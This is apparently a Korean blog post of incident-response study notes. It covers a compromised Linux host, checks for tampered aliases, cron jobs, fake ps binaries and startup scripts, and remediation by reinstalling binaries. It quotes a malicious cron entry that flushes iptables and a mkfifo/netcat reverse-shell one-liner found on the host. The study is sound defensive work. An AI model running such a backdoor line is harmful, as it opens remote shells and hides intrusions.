-
침해사고대응 공부_day 1카테고리 없음 2020. 4. 17. 18:45반응형
/etc/profile 이란 해당 시스템의 모든 사용자가 로그인 될 때 실행되는 스크립트 파일이다.
~/.profile 이란 해당 사용자가 로그인 될 때 실행되는 스크립트 파일이다.
* 리눅스 부팅순서를 이해할 필요가 있다.
* 쉘 공부필요
~/.bashrc란
* HISTSIZE=0 이란 history명령어의 기록이 저장되지 않음.
alias들이 되어있는 것을 확인할 수 있다.
crontab -e를 실행한 화면에서 두 개의 예약을 확인할 수 있다.
iptables -F는 방화벽로그를 5분에 한번 씩 삭제한다는 의미다.
mkfifo fifo; cat fifo|/bin/sh -i 2>&1 | nc 7331 > fifo는 1분에 한번 씩 7331포트로 접속한다는 의미다.
Crontab -e: 현재 등록된 크론탭을 수정
crontab -l: 현재 등록된 크론탭 조회
cat /sbin/bacon | wall -n이란 모든 사용자에게 /sbin/bacon의 내용을 터미널로 공지하겠다라는 의미이다.
ls, su, clear 명령이 정상적으로 실행되지않아 alias를 확인해보니 ls, su가 등록되어있음을 확인할 수 있다.
둘 다 정상적으로 삭제처리 하였다.
정상적인 ls명령어 결과가 출력됨을 확인할 수 있다.
의심스러운 두줄이 존재한다.
ps -ef를 실행했는데 /fake/ps도 같이 실행되었다.
부모프로세스를 보면 ps가 변조된것을 확인할 수 있다.
환경변수를 조회한다.
which [명령어] 명령실행파일의 경로를 확인할 수 있다.
1초에 한번씩 루프를 반복하는 것을 확인할 수 있으며
NetCat으로 포트를 연다
1337의 연결이 끊기면 8888 그 다음 10101 ...
ssh 란 리눅스의 데몬이라 불린다.
ps -ef | grep ssh
service ssh stop
service apache2 stop
? /etc/inittab
1. apt-get update
2. ln -sf /bin/sh /bin/bash
3. apt-get install --reinstall bash
CLOSE TERMINAL AND REOPEN1. apt-get install dlocate (will use this to find the package for our other commands)
2. dlocate /usr/bin/clear – will produce something like this:
ncurses-bin: /usr/bin/clear
bash: /usr/bin/clear_console3. apt-get install –reinstall ncurses-bin
CLOSE TERMINAL AND REOPEN4. Do steps 2 and 3 again for each of /bin/netstat and /bin/ls and /bin/ps
*** If you get a prompt for cdrom, edit the /etc/apt/sources.list file to comment out the cdrom line.
* 프로세스 확인
- ps -ef
* 서비스 확인
- ps -ef | grep ssh
* 서비스 종료
- service apache2 stop
- service ssh stop
* 명령변조 여부
- alias
- which [명령]
- cat [which [명령]]
- 보통 elf로 존재하나, 스크립트로 존재하면 의심
* 계정 여부
- passwd
* 스케줄 여부
- crontab -e
- crontab -l
* 자동실행여부( 환경변수여부 )
- cat /etc/profile
- cat ~/.bashrc
반응형